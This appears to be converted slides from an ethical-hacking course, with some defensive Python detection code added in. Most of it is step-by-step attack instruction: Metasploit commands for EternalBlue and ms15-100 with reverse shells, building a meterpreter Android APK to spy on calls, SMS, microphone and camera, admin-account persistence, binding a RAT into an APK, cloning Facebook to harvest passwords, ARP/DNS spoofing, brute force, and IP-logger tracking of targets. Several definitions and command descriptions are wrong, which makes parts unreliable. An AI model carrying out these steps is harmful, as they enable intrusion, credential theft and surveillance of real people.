
Cyber Security

Cybersecurity is the body of technologies,
processes and practices designed to protect
networks, computers, programs and data from
attack, damage or unauthorized access.

Elements of Cyber Security
End-user Compliance: Creating a security awareness training
program.
Information Security: Protection against the unauthorized use of
information.
Platform and Application Security: Covers
software vulnerability and threat management, application
attacks, software security tools, application firewalls, software
patching and more.
Network Security: Network security consists of the policies and
practices adopted to prevent and monitor unauthorized access,
misuse, modification or denial of a computer network and
network-accessible resources.
Disaster Recovery: Documented process or set of procedures
to recover and protect a business IT infrastructure in the event of
a disaster.
What is Hacking?
Identifying weaknesses in computer systems, software or
networks and exploiting them to gain access.
Who is a Hacker?
A hacker is a person who finds and exploits weaknesses in computer
systems and/or networks to gain access. Hackers are usually skilled computer
programmers with knowledge of computer security.

Types of Hackers
White Hat: Identifies weaknesses in the system/network for the organization.
Black Hat: Identifies weaknesses in the system/network to steal data and
demand money.
Gray Hat: Identifies weaknesses in the system/network for both offence and
defence.
Script Kiddies: Use only tools, without any conceptual knowledge.
Phases of Hacking
Target Scoping
Reconnaissance (Passive Information)
Scanning (Active Information)
Vulnerability Analysis
Building Exploit
Attack and Gain Access
Maintaining Access
Clearing Tracks or Reporting
Hacking Terminology

Vulnerability
A bug or weakness in the software.
Exploit
To make use of (a situation) in a way considered unfair or
underhand.
Payload
A payload refers to the component of a computer virus
that executes a malicious activity.
Zero-day Attack / Exploit
A zero-day vulnerability is a bug in software that is unknown to the
vendor or has not yet been fixed.
Hack Value
The reason or motivation behind the hacking.
Target of Evaluation
Software components / collection of products assembled to
meet the hacking target.
Basic Precautions Taken by Hackers

Tor Browser
VPN / Proxies
https://www.mailinator.com
https://www.guerrillamail.com
http://mailexpire.com
http://www.fakeinbox.com
Foot Printing
Reconnaissance
Organization                          Individual
Website Details                       Email Details
Sub URL Details                       Working Details
Whois Details and Contact Details     Social Networking Details
DNS and Name Servers Information      Any other Contacts Information if Possible
Server IP Addresses Information       Location Details
Public Profiles Information
Internet Service Provider Details
Collect domain information and identify any valuable information, such as
location, contact details and social networking details, from
the search engines and the domain URL.
Collect the domain ownership details from whois.com.
Collect the mail IDs of the required domain.
Collect the mail IDs and subdomain information:
#theharvester -d wipro.com -l 100 -b all
Google Hacking
Expression   Description                 Example
intitle      Search Page Title           intitle: Next Generation Telecom Training
                                         intitle: index of /mp3
inurl        Search URL                  inurl: login.php
filetype     Specific Files              filetype: doc
                                         filetype: xls username password
intext       Search Text of Page Only    intext: HUDA Swarnajayanthi Complex
site         Search Specific Site        site: convergence-labs.com
                                         site: in
link         Search for Links to Pages

inurl: edu.* filetype:xls @gmail.com
inurl: gov.* filetype: xls password
Unprotected cameras
Basics of Networking
Internet is a combination of MSPs, Undersea Backbone Operators and
ISPs

[Figure: Internet Backbone, MSPs, ISPs]
[Figure: network diagram with private hosts 10.1.1.1 to 10.1.1.4, a DNS server, a data center (198.142.36.16), routers with NW / P.No (network / port number) tables, and an IP packet]
The OSI Model
Open Systems Interconnection

7 Application FTP, HTTP, Telnet

6 Presentation JPEG, MPEG, PDF

5 Session BIOS, NetBIOS, NetBEUI

4 Transport TCP, UDP, SCTP

3 Network IP, OSPF, RIP, BGP - 4

2 Datalink ATM, FR, Ethernet

1 Physical RS-232, RJ-45, V.35


The TCP/IP Model
OSI Layer          TCP/IP Model
7 Application      Application
6 Presentation     Application
5 Session          Application
4 Transport        TCP
3 Network          IP
2 Datalink         Host-to-Network
1 Physical         Host-to-Network
IP Addresses Classification
Class Starting Ending

Class A 1.0.0.0 126.255.255.255

Class B 128.0.0.0 191.255.255.255

Class C 192.0.0.0 223.255.255.255

Class D 224.0.0.0 239.255.255.255

Class E 240.0.0.0 255.255.255.255

127.0.0.0 127.255.255.255 Loop Back Adapter


Private IP Addresses

Class A 10.0.0.0 10.255.255.255

Class B 172.16.0.0 172.31.255.255

Class C 192.168.0.0 192.168.255.255


Internet Architecture
Network of Networks
[Figure: networks with private IPs connected to a data center with public IPs]
What are Ports?
Ports are conceptual points of entry into a host
computer.
[Figure: the IP address in the IP header (192.14.26.7) selects the host; the port number in the UDP header (13) selects the process]
ICANN ranges (Internet Corporation for Assigned Names and Numbers)
Range                 From      To
Well Known            0         1,023
Registered            1,024     49,151
Dynamic or Private    49,152    65,535


Well-known ports
Port Protocol
20 FTP Data
21 FTP Control
22 SSH
23 Telnet
25 SMTP
53 Name Server
80 HTTP
110 POP3
143 IMAP
443 HTTPS
546 DHCP Client
547 DHCP Server
Basic Networking Commands
Windows
C:\> ipconfig - Display IP Address Information

C:\> ping - Test the reachability to the given Host

C:\> tracert - Distance Between the Networks (Hop Count)

C:\> netstat - Running Ports Information

Linux
bash# ifconfig - Display IP Address Information

bash# ping - Test the reachability to the given Host

bash# traceroute - Distance Between the Networks (Hop Count)

bash# netstat - Running Ports Information


Foot Printing
Scanning
Objectives of Scanning
Network Scanning
Port Scanning
Vulnerability Research
Tools for Network Scanning
1. nmap (https://nmap.org)
2. Zenmap (Official Nmap Security Scanner GUI)
3. Angry IP Scanner
4. netdiscover (#netdiscover -r 192.168.0.1/24)
5. arping (MAC Address Scanning)
TCP Communication Flags
SYN (Synchronize): The SYN flag is sent first when establishing the handshake
between two hosts to initiate the connection.

URG (Urgent): This flag is used to identify incoming data as 'urgent'. Such incoming
segments do not have to wait until the previous segments are consumed by the
receiving end but are sent directly and processed immediately.

ACK (Acknowledgement): The Acknowledgement flag is used to acknowledge the
successful receipt of packets.

PSH (Push): The Push flag, like the Urgent flag, exists to ensure that the data is given
the priority (that it deserves) and is processed at the sending or receiving end.

FIN (Finish): There will be no more transmission.

RST (Reset): This indicates that the remote host has reset the connection.
Stealth Mode
This scan is also known as a half-open scan, because nmap confirms that a port is open
on the destination side when the destination port makes a two-way handshake with the attacker
or nmap.

Syn
Syn / Ack
Port is Open

Syn
Rst
Port is Closed

The firewall does not raise an alarm for a two-way handshake. In the case of a 3-way handshake,
the firewall raises the alarm if the IP is from outside.
#nmap -sS 192.168.0.146
Note: It scans only 1000 important ports.
Closed: Target software is not running.
Open: Service is running and allowing connections.
Filtered: Service is running behind the firewall.
TCP Connect Scan
Syn
Syn / Ack
Ack
Port is Open

Syn
Rst
Port is Closed

This scan is also known as a Full Open Scan because nmap confirms that a port is open
when it is able to make the 3-way handshake with the destination computer's port.

#nmap -sT 192.168.0.150
Other Scan Options
Software Version Scan
#nmap -sV 192.168.0.146
It checks for the software versions running on the server/target.

OS Detection / FIN Scan
#nmap -O 192.168.0.146 / #nmap -sF 192.168.0.146
This scan is used to identify whether the target system is Linux or Windows.

FIN
Port is Open and Target is Linux

FIN
Rst
Port is Closed and Target is Windows

Note: Honeypots create the impression that the target has a different operating system.
XMAS Scan
#nmap -sX 192.168.0.146
It checks for the OS running on the server/target.

FIN / PSH / URG
Port is Open and Target is Linux

FIN / PSH / URG
RST
Port is Closed and Target is Windows
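The flag sequences shown for the Stealth, TCP Connect, FIN and XMAS scans are also what a defender looks for in packet logs. The following Python example is added here and is not part of the original slides; the packet tuples, the documentation-range addresses and the min_ports threshold are constructed assumptions.

```python
from collections import defaultdict

def exchange(client, server, sport, dport, is_open, completes):
    """Constructed packets for one SYN probe of an open or closed port."""
    out = [(client, server, sport, dport, "SYN")]
    if not is_open:
        return out + [(server, client, dport, sport, "RST/ACK")]
    out.append((server, client, dport, sport, "SYN/ACK"))
    out.append((client, server, sport, dport, "ACK" if completes else "RST"))
    return out

def classify_flow(packets):
    """packets: [(from_initiator, flags)] for one flow, in arrival order."""
    first = packets[0][1]
    from_client = [f for init, f in packets if init]
    from_server = [f for init, f in packets if not init]
    if first == {"FIN", "PSH", "URG"}:
        return "xmas"
    if first == {"FIN"}:
        return "fin"                      # FIN with no earlier SYN in the capture
    if first != {"SYN"}:
        return "other"
    if {"SYN", "ACK"} in from_server:     # the port answered as open
        return "full-connect" if {"ACK"} in from_client else "half-open"
    return "refused"                      # RST from the server, or no answer

def detect_scans(records, min_ports=4):
    """records: [(src, dst, sport, dport, "SYN/ACK")] -> {src: verdict}."""
    flows, initiator = defaultdict(list), {}
    for src, dst, sport, dport, flags in records:
        key = frozenset({(src, sport), (dst, dport)})
        initiator.setdefault(key, (src, dst, dport))
        flows[key].append((src == initiator[key][0], frozenset(flags.split("/"))))
    ports, kinds = defaultdict(set), defaultdict(lambda: defaultdict(int))
    for key, pkts in flows.items():
        src, dst, dport = initiator[key]
        ports[src].add((dst, dport))
        kinds[src][classify_flow(pkts)] += 1
    verdicts = {}
    for src, k in kinds.items():
        unfinished = k["refused"] + k["half-open"]
        if k["xmas"] or k["fin"]:
            verdicts[src] = "xmas-scan" if k["xmas"] else "fin-scan"
        elif len(ports[src]) >= min_ports and unfinished > k["full-connect"]:
            if k["half-open"]:
                verdicts[src] = "syn-scan"      # open ports never got the final ACK
            elif k["full-connect"]:
                verdicts[src] = "connect-scan"  # open ports completed the handshake
            else:
                verdicts[src] = "port-sweep"    # only closed ports were seen
    return verdicts

def sample_capture():
    """Constructed traffic: two scanners, one ordinary client, two odd-flag probes."""
    server, open_ports = "198.51.100.5", {22, 80}
    rec = []
    for i, port in enumerate((21, 22, 23, 80, 443)):
        rec += exchange("192.0.2.10", server, 40000 + i, port, port in open_ports, False)
        rec += exchange("192.0.2.11", server, 41000 + i, port, port in open_ports, True)
    for sport in (50001, 50002):          # ordinary client: two page loads on port 80
        rec += exchange("192.0.2.20", server, sport, 80, True, True)
    rec.append(("192.0.2.12", server, 42000, 22, "FIN/PSH/URG"))
    rec.append(("192.0.2.13", server, 43000, 22, "FIN"))
    return rec

if __name__ == "__main__":
    for src, verdict in sorted(detect_scans(sample_capture()).items()):
        print(src, verdict)
```

A capture that starts in the middle of a connection can show a lone FIN from a legitimate client, so the fin verdict should be confirmed against longer captures before acting on it.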
Foot Printing Counter Measures

1. Configure Webservers to avoid Information Leakage
2. Educate Employees to use nicknames on blogs, groups and forums
3. Do not reveal Critical Information like Annual Reports in Press Releases
4. Limit the amount of Information that we are publishing on the Website
5. Use Foot Printing Techniques to discover and remove any sensitive
information publicly available
6. Always Prefer Private Registration for Domain Registrations
7. Disable Directory Listings in the Web Server


Social Engineering Techniques
Kali Linux Tools to Generate Usernames and
Passwords
Usernames: cupp (Common User Password Profiler)
Note: We need to install this tool in Kali Linux using the command below
#apt-get install cupp
Generate usernames
#cupp -i

Passwords: crunch
Generate passwords
#crunch 5 8 someguess -o destinationname.txt

Attack using Hydra Tool
#hydra -L usernamefile.txt -P passwordfile.txt URL -o <filename to store the
match result>
Identify the User IP Location
Step 1: Select any attractive video / image URL from the Internet.

Step 2: Open the http://www.grabify.link website.

Paste the link in the website and collect the short URL from the website.

Send the link to the target using email or any other social networking service.

Refresh the website for updates and you will get the IP details of the target if
the target clicks on the link.
Get Read Notification of Mail
Step 1: Open the http://readnotify.com website and register the mail ID.

Step 2: Log in to your mail, compose a mail, select the target mail ID,
add .readnotify.com at the end of the target mail ID and send the mail.
Ex: clabs@gmail.com.readnotify.com

Step 3: Log in to readnotify.com using your details to see the
acknowledgement details in case the target reads your mail.
Malware Threats
Malware is malicious software that damages or disables computer systems and
gives limited / full control of the systems to the malware creator for the purpose
of theft or fraud.
Trojans / RATs: A malicious computer program which is used to hack into a computer by
misleading users of its true intent.

Virus: A piece of code which is capable of copying itself and corrupting the system or
destroying data.

Worms: A standalone malware computer program that replicates itself in order to spread to
other computers.

Rootkits: Designed to hide the fact that an operating system has been compromised.

Spyware: Aims to gather information about a person or organization without their
knowledge.

Ransomware: A type of malicious software that blocks access to the victim's
data.

Adware: Software that automatically displays or downloads advertising material such as
banners or pop-ups when a user is online.

Crypters: Crypters are software tools that use a combination of encryption, obfuscation, and
code manipulation
Trojan / RAT
A Trojan / RAT (Remote Administration Tool) is a malicious
computer program which is used to hack into a computer by
misleading users of its true intent.
1. DarkComet Rat
2. Pro Rat
3. Sub 7
4. Poison Ivy Rat
5. Zeus Rat
6. Cyber Gate Rat
7. Cerve Virus Rat
8. Turkojan Rat
9. Spy Eye
10. NJ Rat
11. Stuxnet
Hack Windows System using Social Engineering and
Darkcomet Rat Tool
Hack Android Mobile using Social
Engineering and Andro Rat Tool
1. Download Andro Rat Software and Run Andro Rat Binder
2. Upload any Apk File to Attach the RAT along with APK using Build+Bind Option
Or
Use only Bind Option to Attach the RAT File with an Inbuilt APK File
3. Press go to Generate the APK File.
4. Use Social Engineering to Make Install of APK file in Target Mobile and Run.
5. Run androrat tool present in the Androrat Directory to Capture the Information from
the Android Mobile.
Network Models in Social Engineering
Attacker and Target are in the Same Network
Attacker and Target are in Public Networks
Attacker and Target are in Different Private Networks
or Only Attacker in Private Network
Step 1: Port Forwarding (only if the Router has a Public IP Address)

Step 2: Create a Temporary Sub Domain from noip.com


Information Security Threats
Natural Threat
Physical Threat
Human Threats

Hackers

Social Engineering
Functionality
Lack of Knowledge and Awareness

Security Usability
Prerequisites
1. Basics of Linux
2. Basics of Windows
3. Basics of Networking
4. Working with Virtual Box and Network Configurations
5. Working with Kali
6. Working with Tor Browser
7. Working with VPN and VPN Tools
8. Creating Fake Mail IDs for Temporary Purpose to Register in
Different Websites Ex: Mailinator.com
9. Get the Public IP Address -> grabify ip logger (grabify.link)
10. Get the Temporary Domain Name -> noip.com
Vulnerability Research
The process of discovering vulnerabilities and design flaws that will open an
operating system and its applications to attack or misuse.

Vulnerabilities are classified based on security level, severity level (low,
medium or high) and exploit range (local or remote).

1. CVE: Common Vulnerability Entry
2. CVSS: Common Vulnerability Security Score
3. OSVDB: Open Source Vulnerability Data Base

Microsoft Vulnerability Code
MS17-001
Year Identified - Serial No.

Some Websites
1. Securityfocus.com
2. packetstormsecurity.com
3. us-cert.gov (Computer Emergency Response Team)
4. www.exploit-db.com
5. www.thehackernews.com
System Hacking with Metasploit
Exploit: A piece of malicious program code which takes advantage of a
vulnerability to compromise the target computer and executes the payload for
controlling remote computers.

Types of Exploits:
1. Public Exploits
2. Private Exploits (Zero Day Exploit)

Types of Public and Private Exploits
1. Remote Exploits
2. Local or Privilege Escalation Exploits

Types of Remote and Local Exploits
1. Server side Exploit -> Having Information about the target
2. Client side Exploit -> Use Social Engineering (send mail/files)
Hacking with Metasploit
Metasploit: Metasploit is a self-described framework for
cyber exploitation. As a framework, it eases the effort to
exploit known vulnerabilities in networks, operating systems and
applications, and to develop new exploits for new or
unknown vulnerabilities.

Desktop software included in the Metasploit framework
1. msfconsole
2. msfvenom
3. armitage
List of Modules available in msfconsole (6 Modules)
1. Exploits
2. Auxiliary (Network Scanners, Port Scanners, Enumeration Tools, DoS Attack
Tools)
3. Payload
4. Post (Pattern Lock Remove, rooted phone WhatsApp data)
5. Encoders (Without Recognize Payload) (Crypters Softwares using the
Payload)
6. Nop (No Operation Buffer Overflow Attacks)

List of Modules available in msfvenom (it is a backdoor generator used to
create files)
1. Payload
2. Encoders
3. Nop
Method to Hack Windows 7 and 8 with
ms17-010 (eternal blue) exploit (Server)

1. Check whether port 445 is open in the Target System/Network using nmap
#nmap -O <target ip address>
2. msf> search ms17-010
3. copy the selected exploit according to your requirement
4. msf> use <paste the selected exploit>
5. msf> show options (To know the Inputs required)
6. msf> set payload windows/shell/reverse_tcp
7. msf> set RHOST <Target IP Address>
8. msf> set LHOST <attacker IP Address>
9. msf> set LPORT 1212
10. msf> exploit
Note: if any error unset the payload
11. msf> unset payload
12. msf> set payload windows/meterpreter/reverse_tcp

How to Maintain the Session in Windows Machine
1. c:\> net user <username> <password> /add
2. c:\> net localgroup administrators <username> /add
3. c:\> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
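The three session-maintenance commands above each leave a log trace: a new local account (Security event 4720), a member added to the local Administrators group (Security event 4732) and a registry write that sets fDenyTSConnections to 0 (Sysmon event 13). The following Python example is added here and is not part of the original slides; it correlates those traces per host, and the record field names, hosts, SIDs and timestamps are constructed assumptions rather than a real log schema.

```python
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"   # well-known SID of the local Administrators group
RDP_SWITCH = r"\control\terminal server\fdenytsconnections"
REG_PATH = r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"

# Constructed, simplified event records (field names are assumptions for this example).
SAMPLE_EVENTS = [
    {"time": "2024-01-10 10:00:05", "host": "WS01", "id": 4720,
     "account": "support", "sid": "S-1-5-21-1-1001"},
    {"time": "2024-01-10 10:00:09", "host": "WS01", "id": 4732,
     "member_sid": "S-1-5-21-1-1001", "group_sid": ADMINISTRATORS_SID},
    {"time": "2024-01-10 10:00:20", "host": "WS01", "id": 13,
     "key": REG_PATH, "value": 0},
    # Help desk creates an ordinary user; an unrelated SID is made admin later.
    {"time": "2024-01-10 11:00:00", "host": "WS02", "id": 4720,
     "account": "jdoe", "sid": "S-1-5-21-2-2001"},
    {"time": "2024-01-10 11:02:00", "host": "WS02", "id": 4732,
     "member_sid": "S-1-5-21-2-1500", "group_sid": ADMINISTRATORS_SID},
    # Remote Desktop is switched off here (value 1), which is not the pattern.
    {"time": "2024-01-10 11:03:00", "host": "WS02", "id": 13,
     "key": REG_PATH, "value": 1},
]

def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")

def find_persistence(events, window=timedelta(minutes=10)):
    """Report new accounts that are made administrator and/or followed by
    Remote Desktop being enabled on the same host within the window."""
    events = sorted(events, key=_ts)
    findings = []
    for ev in events:
        if ev["id"] != 4720:
            continue
        start, steps = _ts(ev), ["account-created"]
        for later in events:
            if later["host"] != ev["host"]:
                continue
            if not (start <= _ts(later) <= start + window):
                continue
            if (later["id"] == 4732 and later["member_sid"] == ev["sid"]
                    and later["group_sid"] == ADMINISTRATORS_SID):
                steps.append("added-to-administrators")
            elif (later["id"] == 13 and later["value"] == 0
                    and later["key"].lower().endswith(RDP_SWITCH)):
                steps.append("rdp-enabled")
        if len(steps) > 1:
            findings.append({"host": ev["host"], "account": ev["account"],
                             "steps": steps})
    return findings

if __name__ == "__main__":
    for finding in find_persistence(SAMPLE_EVENTS):
        print(finding)
```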
Method to Hack Windows 7 and Windows
Server 2008 r2 with ms15-100 Exploit (Client)
1. msf> search ms15-100
2. copy the selected exploit according to your requirement
3. msf> use <paste the selected exploit>
4. msf> show options (To know the Inputs required)
5. msf> set SRVHOST 192.168.0.195
6. msf> set payload windows/shell/reverse_tcp
7. msf> show options
8. msf> set LHOST 192.168.0.195
9. msf> set LPORT 1212
10. msf> exploit
11. Copy the File into Apache Webserver or Send the Link to access the Infected File
12. msf> sessions -l
13. msf> sessions -i <session id>
Method to Hack Android Phone using
msfvenom & msfconsole
1. Execute the msfvenom tool with the option below to create the APK
file.
#msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.102
LPORT=5131 > /var/www/html

2. Run the msfconsole Tool

3. msf> use exploit/multi/handler

4. msf> set payload android/meterpreter/reverse_tcp

5. msf> set LHOST 192.168.10.102

6. msf> set LPORT 5131

7. msf> exploit
List of Android Meterpreter Commands
1. meterpreter> sysinfo -> System Information
2. meterpreter> hide_app_info -> Hide App Icon
3. meterpreter> check_root -> Phone is Rooted or not
4. meterpreter> dump_calllog -> All Logs will be Saved
5. meterpreter> dump_contacts -> All Contacts will be Stored
6. meterpreter> dump_sms -> Display all the Key Logger Recorded Data
7. meterpreter> record_mic -d 15 -> Record the Voice
8. meterpreter> webcam_list -> Cameras List
9. meterpreter> webcam_snap / webcam_snap -i 2 -> Take the Screenshot
10. meterpreter> shell -> Display the List of Web Cams
11. shell> download <src> <destination> -> Download File from Phone
12. shell> upload <src> <destination> -> Upload File to Phone
List of Meterpreter Commands
14. meterpreter> cd <path> -> Change the Directories
15. meterpreter> upload source dest -> Upload the File
Note: We can add attrib +h +s +r <filename> -> To hide the File
16. meterpreter> shell
17. meterpreter> download source dest -> Download the file
18. meterpreter> clearev
19. meterpreter> getprivs -> Get all the privileges
20. meterpreter> migrate <processid> -> Move to the process with the given process id to
get more privileges
21. meterpreter> hashdump -> Extract Windows Account Password
22. meterpreter> background -> Minimize the Interpreter
23. meterpreter> sessions -l -> View Sessions
24. meterpreter> search bypassuac -> This record the voice but max 15 Secs
Phishing Attacks
Phishing: Phishing emails or pop-ups redirect the user to fake web pages that
clone trustworthy sites and ask them to submit their personal information.
Site: z-shadow.co / shadowwave.com
Kali Linux Tools: Application -> Social Engineering Tools -> SET (Social
Engineering Tool Kit)
set> 1                          Step 1: Social Engineering Attacks
set> 2                          Step 2: Website Attack Vectors
set> 3                          Step 3: Credential Harvester Attack Method
set> 2                          Step 4: Cloner
set> 192.168.10.106             Step 5: Enter IP Address where to Capture Information
set> http://www.facebook.com    Step 6: Select the Website to Create the Fake Website
--------------------------
Capture data using sniffers and identify the passwords if the user entered information.
Filter: http.request.method == "POST"
DNS Poisoning
It is a technique that tricks a DNS server into believing that it has received authentic
information when in reality it has not. It results in the substitution of a false IP address at
the DNS level, where web addresses are converted into numeric IP addresses. It allows an
attacker to replace the IP address entries for a target site on a given DNS server with the IP
address of a server he/she controls.

Step1: Create a file and write the entries in the following way
192.168.10.6 www*
192.168.10.6 login*
192.168.10.6 accounts*
192.168.10.6 http*

Step2: Save the file in the system

Step3: Port Forwarding
#echo 1 > /proc/sys/net/ipv4/ip_forward

Step4: arpspoof -t <routerip> <targetip>

Step5: arpspoof -t <targetip> <routerip>

Step6: dnsspoof -f /root/Desktop/hosts.txt host <targetip> and udp port 53
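Steps 4 and 5 make one machine answer ARP for both the router and the target, which is visible to anyone watching ARP replies on the segment. The following Python example is added here and is not part of the original slides; it flags an IP whose MAC address changes and a MAC that claims the gateway's address alongside others. The reply tuples, MAC addresses and the trust-on-first-use baseline are constructed assumptions.

```python
from collections import defaultdict

GATEWAY = "192.168.10.1"          # constructed router address
VICTIM = "192.168.10.50"          # constructed target address
ROGUE_MAC = "02:00:00:00:00:06"   # constructed MAC of the host at 192.168.10.6

# Constructed ARP replies: (time, sender IP, sender MAC), in arrival order.
SAMPLE_REPLIES = [
    (1, GATEWAY, "02:00:00:00:00:01"),
    (2, VICTIM, "02:00:00:00:00:50"),
    (3, "192.168.10.6", ROGUE_MAC),
    (10, GATEWAY, ROGUE_MAC),      # "router is at me", sent to the target
    (11, VICTIM, ROGUE_MAC),       # "target is at me", sent to the router
    (12, GATEWAY, ROGUE_MAC),      # spoofed replies repeat to keep caches poisoned
    (13, VICTIM, ROGUE_MAC),
    (14, GATEWAY, "02:00:00:00:00:01"),
]

def detect_arp_spoofing(replies, gateway_ip):
    """Return MAC conflicts per IP and MACs that sit between hosts and the gateway."""
    learned = {}                   # ip -> MAC first seen for it (trust on first use)
    claimed = defaultdict(set)     # mac -> every IP it has announced
    conflicts, seen = [], set()
    for ts, ip, mac in replies:
        mac = mac.lower()
        claimed[mac].add(ip)
        known = learned.setdefault(ip, mac)
        if known != mac and (ip, mac) not in seen:
            seen.add((ip, mac))    # report each poisoned binding once
            conflicts.append({"time": ts, "ip": ip,
                              "learned": known, "announced": mac})
    # A MAC that announces the gateway's IP plus other addresses, without being
    # the gateway's learned MAC, is relaying traffic between them.
    relays = {mac: sorted(ips) for mac, ips in claimed.items()
              if gateway_ip in ips and len(ips) > 1
              and learned.get(gateway_ip) != mac}
    return {"conflicts": conflicts, "relays": relays}

if __name__ == "__main__":
    result = detect_arp_spoofing(SAMPLE_REPLIES, GATEWAY)
    for conflict in result["conflicts"]:
        print("conflict", conflict)
    for mac, ips in result["relays"].items():
        print("relay", mac, ips)
```

A legitimate address change (a replaced network card, a DHCP lease handed to another device) also produces a conflict entry, so the relay finding is the stronger signal.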


Crypter
A crypter is software used to hide viruses or trojans from antivirus products so that
they are not detected or deleted by them. Thus a crypter is a program that allows
users to crypt the source code of their program.

Types of Crypters:
1. Public
2. Demo Crypter
3. Private or Zero Day Crypter

Types of Public and Private Crypters
1. UD Crypters (Undetectable Crypters)
2. FUD Crypters (Fully Undetectable Crypters)

Types of UD and FUD Crypters
1. Runtime Crypters
2. Scantime Crypters

Hide Data Behind the Image
Step1: Create a folder, copy the data and create the ZIP.
Step2: Take any image.
Step3: Run the command
cmd:\> copy /b file.jpg+topsecret.zip outputfilename.jpg

Note: We can identify this using WinHex software
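The copy /b command simply appends the ZIP bytes after the image, so the archive can be found without a hex editor by looking for a ZIP directory inside a file that starts as a JPEG. The following Python example is added here and is not part of the original slides; the JPEG stand-in (marker bytes only, not a decodable picture) and the archive contents are constructed for the demonstration.

```python
import io
import zipfile

JPEG_SOI = b"\xff\xd8"   # start-of-image marker at the beginning of every JPEG
JPEG_EOI = b"\xff\xd9"   # end-of-image marker

def find_appended_zip(data):
    """Return details of a ZIP archive appended to a JPEG, or None if there is none."""
    if not data.startswith(JPEG_SOI):
        return None
    buf = io.BytesIO(data)
    if not zipfile.is_zipfile(buf):        # looks for the ZIP end-of-directory record
        return None
    with zipfile.ZipFile(buf) as archive:
        entries = archive.infolist()
        if not entries:
            return None
        # zipfile corrects header offsets for data placed in front of the archive,
        # so the smallest offset is where the hidden ZIP starts inside the file.
        offset = min(entry.header_offset for entry in entries)
        return {
            "offset": offset,
            "names": [entry.filename for entry in entries],
            "appended_bytes": len(data) - offset,
            "image_ends_with_eoi": data[:offset].endswith(JPEG_EOI),
        }

def build_sample():
    """Constructed test input: a JPEG stand-in and the same bytes with a ZIP appended."""
    jpeg = JPEG_SOI + b"\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 9 + JPEG_EOI
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w") as archive:
        archive.writestr("topsecret.txt", "constructed test content")
    return jpeg, jpeg + zbuf.getvalue()

if __name__ == "__main__":
    clean, combined = build_sample()
    print("clean image:", find_appended_zip(clean))
    print("combined file:", find_appended_zip(combined))
```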


Future Topics

1. More Malware Effects
2. More Advanced Exploit Attacks
3. Web Server Attacks
4. Man in the Middle Attacks
5. Denial Of Services (DOS) and Distributed Denial of Services (DDOS)
6. Session Hijacking
7. Cross Site Scripting (XSS)
8. SQL Injection
9. Web Application Security Testing
10. Wifi Hacking
11. Cryptography and Hash Functions
Honeypots
Honeypots: A honeypot is an information system resource that is expressly set up to
attract and trap people who attempt to penetrate an organizational network. A honeypot
can log port access attempts or monitor an attacker's keystrokes. These could be early
warnings of a more concerted attack.
Types of Honeypots
1. Low Interaction Honeypots:
These honeypots simulate only a limited number of services and applications of a
target system or network. They are used to collect information about dangerous attacks.
Ex: KF Sensor, Honeyd, Honeybot, Spector

2. High Interaction Honeypots:
These honeypots simulate all services and applications. They can be completely
compromised by attackers, who get full access to the system in a controlled area.
Ex: Honeynets, Symantec Decoy Server
IDS (Intrusion Detection System)
An IDS inspects all inbound and outbound network traffic for suspicious patterns that may
indicate a network or system security breach. The IDS checks traffic for
signatures that match known intrusion patterns and raises an alarm when a match is found.

IPS (Intrusion Prevention System)
An IPS inspects all inbound and outbound network traffic for suspicious patterns that may
indicate a network or system security breach. The IPS checks traffic for
signatures that match known intrusion patterns, and it raises an alarm and blocks the traffic when a
match is found.

Types of IDS and IPS
Network Based IDS/IPS
Checkpoint, Juniper, Dell SonicWall, Cyberoam, Cisco IDS & IPS, McAfee
Security Agent, Imperva
Host Based IDS/IPS
Kaspersky Internet Security, Avast Internet Security, Bitdefender Internet
Security etc.
